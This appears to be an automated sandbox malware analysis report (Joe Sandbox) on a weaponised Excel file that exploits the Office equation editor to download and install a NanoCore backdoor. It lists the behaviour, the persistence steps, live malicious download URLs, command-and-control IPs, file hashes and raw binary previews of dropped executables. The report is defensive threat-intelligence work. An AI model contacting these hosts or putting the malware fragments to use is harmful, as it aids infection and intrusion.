        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection312DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 384530 Sample: Files  Specification.xlsx Startdate: 09/04/2021 Architecture: WINDOWS Score: 100 51 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->51 53 Multi AV Scanner detection for domain / URL 2->53 55 Found malware configuration 2->55 57 16 other signatures 2->57 7 EQNEDT32.EXE 12 2->7         started        12 smtpsvc.exe 2->12         started        14 EXCEL.EXE 38 36 2->14         started        process3 dnsIp4 41 covid19vaccinations.hopto.org 34.220.10.254, 49167, 80 AMAZON-02US United States 7->41 35 C:\Users\user\AppData\Local\...\loki[1].exe, PE32 7->35 dropped 37 C:\Users\Public\vbc.exe, PE32 7->37 dropped 61 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->61 16 vbc.exe 3 7->16         started        file5 signatures6 process7 file8 27 C:\Users\user\AppData\...\tHyARuOEdFlN.exe, PE32 16->27 dropped 29 C:\Users\user\AppData\Local\...\tmp4C3D.tmp, XML 16->29 dropped 43 Multi AV Scanner detection for dropped file 16->43 45 Machine Learning detection for dropped file 16->45 47 Uses schtasks.exe or at.exe to add and modify task schedules 16->47 49 3 other signatures 16->49 20 RegSvcs.exe 1 8 16->20         started        25 schtasks.exe 16->25         started        signatures9 process10 dnsIp11 39 79.134.225.30, 1144, 49168, 49169 FINK-TELECOM-SERVICESCH Switzerland 20->39 31 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 20->31 dropped 33 C:\Program Files (x86)\...\smtpsvc.exe, PE32 20->33 dropped 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->59 file12 signatures13

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\tHyARuOEdFlN.exe100%Joe Sandbox ML
        C:\Users\Public\vbc.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loki[1].exe100%Joe Sandbox ML
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%MetadefenderBrowse
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loki[1].exe17%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
        C:\Users\user\AppData\Roaming\tHyARuOEdFlN.exe17%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
        C:\Users\Public\vbc.exe17%ReversingLabsByteCode-MSIL.Backdoor.NanoBot

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        7.2.RegSvcs.exe.500000.4.unpack100%AviraTR/NanoCore.fadteDownload File
        7.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        covid19vaccinations.hopto.org2%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://covid19vaccinations.hopto.org/loki.exe100%Avira URL Cloudmalware
        nassiru1155.ddns.net0%Avira URL Cloudsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        79.134.225.306%VirustotalBrowse
        79.134.225.300%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        covid19vaccinations.hopto.org
        34.220.10.254
        truetrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://covid19vaccinations.hopto.org/loki.exetrue
        • Avira URL Cloud: malware
        unknown
        nassiru1155.ddns.nettrue
        • Avira URL Cloud: safe
        unknown
        79.134.225.30true
        • 6%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.%s.comPAvbc.exe, 00000004.00000002.2183115808.000000000BC20000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2366501562.0000000005320000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        low
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.2183115808.000000000BC20000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2366501562.0000000005320000.00000002.00000001.sdmpfalse
          high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2177066923.0000000002605000.00000004.00000001.sdmpfalse
            high
            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              34.220.10.254
              covid19vaccinations.hopto.orgUnited States
              16509AMAZON-02UStrue
              79.134.225.30
              unknownSwitzerland
              6775FINK-TELECOM-SERVICESCHtrue

              General Information

              Joe Sandbox Version:31.0.0 Emerald
              Analysis ID:384530
              Start date:09.04.2021
              Start time:11:42:12
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 23s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:Files Specification.xlsx
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:10
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.expl.evad.winXLSX@9/24@1/2
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 0.2% (good quality ratio 0.1%)
              • Quality average: 27%
              • Quality standard deviation: 24.3%
              HCA Information:
              • Successful, ratio: 94%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xlsx
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
              • TCP Packets have been reduced to 100
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              11:43:06API Interceptor188x Sleep call for process: EQNEDT32.EXE modified
              11:43:17API Interceptor35x Sleep call for process: vbc.exe modified
              11:43:21API Interceptor1x Sleep call for process: schtasks.exe modified
              11:43:21API Interceptor968x Sleep call for process: RegSvcs.exe modified
              11:43:23AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              11:43:33API Interceptor3x Sleep call for process: smtpsvc.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              79.134.225.30J62DQ7fO0b.exeGet hashmaliciousBrowse
                oE6O5K1emC.exeGet hashmaliciousBrowse
                  AIC7VMxudf.exeGet hashmaliciousBrowse
                    Payment Confirmation.exeGet hashmaliciousBrowse
                      JOIN.exeGet hashmaliciousBrowse
                        Itinerary.pdf.exeGet hashmaliciousBrowse
                          vVH0wIFYFd.exeGet hashmaliciousBrowse
                            GWee9QSphp.exeGet hashmaliciousBrowse
                              s7pnYY2USl.jarGet hashmaliciousBrowse
                                s7pnYY2USl.jarGet hashmaliciousBrowse
                                  SecuriteInfo.com.BehavesLike.Win32.Generic.dc.exeGet hashmaliciousBrowse
                                    Import and Export Regulation.xlsxGet hashmaliciousBrowse
                                      BBdzKOGQ36.exeGet hashmaliciousBrowse
                                        BL.exeGet hashmaliciousBrowse
                                          Payment Invoice.exeGet hashmaliciousBrowse
                                            Payment Invoice.pdf.exeGet hashmaliciousBrowse
                                              Inquiries_scan_011023783591374376585.exeGet hashmaliciousBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                covid19vaccinations.hopto.orgAPR 21SOA.xlsxGet hashmaliciousBrowse
                                                • 144.168.163.101

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                AMAZON-02USIN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                • 52.221.6.123
                                                dfNB2M7Dlx.exeGet hashmaliciousBrowse
                                                • 3.142.167.54
                                                qRsvaKcvxZ.exeGet hashmaliciousBrowse
                                                • 3.14.206.30
                                                oRIYd8v68R.exeGet hashmaliciousBrowse
                                                • 3.13.191.225
                                                huqgk.exeGet hashmaliciousBrowse
                                                • 54.202.57.165
                                                PO_NO.04-PRFTMUM210040.exeGet hashmaliciousBrowse
                                                • 52.58.78.16
                                                PO-RFQ # 097663899 pdf .exeGet hashmaliciousBrowse
                                                • 52.15.160.167
                                                securedmessage.htmGet hashmaliciousBrowse
                                                • 35.181.18.61
                                                Three.exeGet hashmaliciousBrowse
                                                • 65.9.66.2
                                                Four.exeGet hashmaliciousBrowse
                                                • 99.86.3.91
                                                Six.exeGet hashmaliciousBrowse
                                                • 99.86.3.91
                                                One.exeGet hashmaliciousBrowse
                                                • 99.86.3.91
                                                Five.exeGet hashmaliciousBrowse
                                                • 52.209.97.177
                                                Two.exeGet hashmaliciousBrowse
                                                • 65.9.66.8
                                                PO45937008ADENGY.exeGet hashmaliciousBrowse
                                                • 52.15.160.167
                                                PO.exeGet hashmaliciousBrowse
                                                • 44.227.76.166
                                                bt.apkGet hashmaliciousBrowse
                                                • 52.35.36.124
                                                invoice.exeGet hashmaliciousBrowse
                                                • 35.156.117.131
                                                Calt7BoW2a.exeGet hashmaliciousBrowse
                                                • 3.14.206.30
                                                0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                • 52.40.12.112
                                                FINK-TELECOM-SERVICESCHJ62DQ7fO0b.exeGet hashmaliciousBrowse
                                                • 79.134.225.30
                                                oE6O5K1emC.exeGet hashmaliciousBrowse
                                                • 79.134.225.30
                                                zunUbtZ2Y3.exeGet hashmaliciousBrowse
                                                • 79.134.225.40
                                                EASTERS.exeGet hashmaliciousBrowse
                                                • 79.134.225.118
                                                LIST OF POEA DELISTED AGENCIES.pdf.exeGet hashmaliciousBrowse
                                                • 79.134.225.9
                                                AWB.pdf.exeGet hashmaliciousBrowse
                                                • 79.134.225.102
                                                AIC7VMxudf.exeGet hashmaliciousBrowse
                                                • 79.134.225.30
                                                9mm case for ROYAL METAL INDUSTRIES 3milmonth Specification drawings.exeGet hashmaliciousBrowse
                                                • 79.134.225.21
                                                PO50164.exeGet hashmaliciousBrowse
                                                • 79.134.225.79
                                                Fast color scan to a PDFfile_1_20210331084231346.pdf.exeGet hashmaliciousBrowse
                                                • 79.134.225.102
                                                n7dIHuG3v6.exeGet hashmaliciousBrowse
                                                • 79.134.225.92
                                                F6JT4fXIAQ.exeGet hashmaliciousBrowse
                                                • 79.134.225.92
                                                order_inquiry2094.xls.exeGet hashmaliciousBrowse
                                                • 79.134.225.102
                                                5H957qLghX.exeGet hashmaliciousBrowse
                                                • 79.134.225.25
                                                yBio5dWAOl.exeGet hashmaliciousBrowse
                                                • 79.134.225.7
                                                wDIaJji4Vv.exeGet hashmaliciousBrowse
                                                • 79.134.225.7
                                                DkZY1k3y9F.exeGet hashmaliciousBrowse
                                                • 79.134.225.23
                                                hbvo9thTAX.exeGet hashmaliciousBrowse
                                                • 79.134.225.7
                                                SCAN ORDER DOC 040202021.exeGet hashmaliciousBrowse
                                                • 79.134.225.71
                                                Waybill Doc_pdf.exeGet hashmaliciousBrowse
                                                • 79.134.225.92

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loki[1].exeJ62DQ7fO0b.exeGet hashmaliciousBrowse
                                                  C:\Users\Public\vbc.exeJ62DQ7fO0b.exeGet hashmaliciousBrowse
                                                    C:\Users\user\AppData\Roaming\tHyARuOEdFlN.exeJ62DQ7fO0b.exeGet hashmaliciousBrowse
                                                      C:\Program Files (x86)\SMTP Service\smtpsvc.exeUpdate of the OFFICE PACK.xlamGet hashmaliciousBrowse
                                                        Quotation Assurance.docGet hashmaliciousBrowse
                                                          Update of the OFFICE PACK.docGet hashmaliciousBrowse
                                                            DHL Documents 7.exeGet hashmaliciousBrowse

                                                              Created / dropped Files

                                                              C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):45216
                                                              Entropy (8bit):6.136703067968073
                                                              Encrypted:false
                                                              SSDEEP:768:Vjs96lj/cps+zk2d0suWB6Iq8NbeYjiwMEBQwp:VAhRzdd0sHI+eYfMEBHp
                                                              MD5:62CE5EF995FD63A1847A196C2E8B267B
                                                              SHA1:114706D7E56E91685042430F783AE227866AA77F
                                                              SHA-256:89F23E31053C39411B4519BF6823969CAD9C7706A94BA7E234B9062ACE229745
                                                              SHA-512:ABACC9B3C03631D3439A992504A11FB3C817456FFA4760EACE8FE5DF86908CE2F24565A717EB35ADCF60C34A78A1F6E24881BA0B8680FDE66D97085FDE4423B2
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: Update of the OFFICE PACK.xlam, Detection: malicious, Browse
                                                              • Filename: Quotation Assurance.doc, Detection: malicious, Browse
                                                              • Filename: Update of the OFFICE PACK.doc, Detection: malicious, Browse
                                                              • Filename: DHL Documents 7.exe, Detection: malicious, Browse
                                                              Reputation:low
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.W..............0..d............... ........@.. ...............................J....`.....................................O.......8............r...>..........t................................................ ............... ..H............text....c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B........................H........+..4S..........$...P...t........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o.........(....o ...o!.....,..o"...t......*..0..(....... ....s#........o$....X..(....-..*.o%...*.0...........(&......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loki[1].exe
                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:downloaded
                                                              Size (bytes):1865728
                                                              Entropy (8bit):7.042310357804828
                                                              Encrypted:false
                                                              SSDEEP:49152:9Ni8vaKvPuXtaD5LNaw/RRMbBRtlxaJvxdrLBF+F36q:Bzv4w/RRMbBRZaJvz3XO35
                                                              MD5:A74ECE32BC1B6DB38A2D379C7FC78D2C
                                                              SHA1:25EA63E67B842641E57BC5B405EA51EC9C6BEB5B
                                                              SHA-256:20E490AFBA639EA251A2F095A8B9B85E1B9922FF6D8B6F47CEB567BA62521A28
                                                              SHA-512:63A026DEDC6B2478A0CA7625534045E98334185BFEA76B7DAA74C1FE8CB32757AB26F97ACE14B8400EA70DF8FDDD0F10DBA51041F2444534A11BF49F41746672
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Joe Sandbox View:
                                                              • Filename: J62DQ7fO0b.exe, Detection: malicious, Browse
                                                              Reputation:low
                                                              IE Cache URL:http://covid19vaccinations.hopto.org/loki.exe
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o`................................. ........@.. ....................................@.....................................W.... ..t............................................................................ ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc...t.... ......................@..@........................H............p..........D...............................................z.(......}.....( ...o!...}....*..*...0...........{......E............8...Z...u................*..}..... ].4S}......}.....*..}..... ..Q.}......}.....*..}......{.... Km.a}......}.....*..}..... ,...}......}.....*..}......{.... ..=.a}......}.....*..}..... ....}......}.....*..}..... "G.R}......}.....*..}.....*...{....*.s"...z.2.{.....f...*....0..<........{......3..{....( ...o!...3...}......+..s.......{....}..
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\115815B4.jpeg
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 138x95, frames 3
                                                              Category:dropped
                                                              Size (bytes):5312
                                                              Entropy (8bit):7.87002614928457
                                                              Encrypted:false
                                                              SSDEEP:96:aQEbvekDqDOhVftC8Oyl4UDAF30vhbt304R5h6pj19nrGtSu:aQimLDChtCOlCshbtV5h6B1J8Su
                                                              MD5:4A55E9D2A20FED087D9D353A1B8B225E
                                                              SHA1:8575304CF3E0891BEE446131C9232F4F0AF6FF8D
                                                              SHA-256:8A1747DC2F352FA0CB9EA6AE9679805698B1530FBD1AFA3EA7BB04B223076BBD
                                                              SHA-512:647AE5B916FE1BE38FBDE28B43D20527A8C7CEFA60081625754F96CA1684017E5D04E863EE7FA78B5D7143433204991FB37EE91D5D445C1A87B08A6DE27E2085
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: ......JFIF.............C....................................................................C......................................................................._...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......v..|_.O...Noo.....!..Q.9.........?..{j....d...f.H9....q.T?g..N.?.....~.}6...C.!..e;H.pkGV.....-^=s....p...\...C.......#.......J.C..J...n+e..m..o......9.G.JZYd..@..$...A?@MU..~..C,..yR..S9.\#..~~..P.._...X^....ngu....3..!........l.`qRj.....U.#....\.,....v.........F1.Z.7..o....e.6.irk......%.7..F...m..q..R.Ki..x..;./.h..*..l..wd|..7....u.]....&...D ...
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18B2D225.png
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):79394
                                                              Entropy (8bit):7.864111100215953
                                                              Encrypted:false
                                                              SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                              MD5:16925690E9B366EA60B610F517789AF1
                                                              SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                              SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                              SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2302D74A.emf
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                              Category:dropped
                                                              Size (bytes):3659592
                                                              Entropy (8bit):1.0022313728649812
                                                              Encrypted:false
                                                              SSDEEP:6144:YFPAuIU4U9tVvfJHGCOd+FPAuIU4U9tVvfJHGCOd2:YmIvhGJd+mIvhGJd2
                                                              MD5:737130889222DA6A24DB863283F9AA2B
                                                              SHA1:91A31F3169BCDC0CBFC1F47E75AABDA68C764DA0
                                                              SHA-256:7B23C702859098656105259373C4A99936AEFF58064521496320532F23BE4772
                                                              SHA-512:C2B7A34156164DD7E18E9CE206BCAF8324A9B545E035A14145CE98EF7D94664816676DF0E62DE31E0A6604EEAF7B036C3DCD59223ABF3DCB35EFC42EEF108FD9
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview: ....l...............\...............dS.. EMF....H.7.....................V...........................fZ..U"..F...4...(...GDIC........l..u....................i...........................................i...A. ...]...............(.......].............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36DE3ABF.png
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):111378
                                                              Entropy (8bit):7.963743447431302
                                                              Encrypted:false
                                                              SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                              MD5:5ACDB72AF63832D23CED937B6B976471
                                                              SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                              SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                              SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                              Malicious:false
                                                              Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B5FB44E.png
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):111378
                                                              Entropy (8bit):7.963743447431302
                                                              Encrypted:false
                                                              SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                              MD5:5ACDB72AF63832D23CED937B6B976471
                                                              SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                              SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                              SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                              Malicious:false
                                                              Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\66C69E2.png
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):51166
                                                              Entropy (8bit):7.767050944061069
                                                              Encrypted:false
                                                              SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                              MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                              SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                              SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                              SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                              Malicious:false
                                                              Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87748436.jpeg
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 132x92, frames 3
                                                              Category:dropped
                                                              Size (bytes):5108
                                                              Entropy (8bit):7.8542722177825945
                                                              Encrypted:false
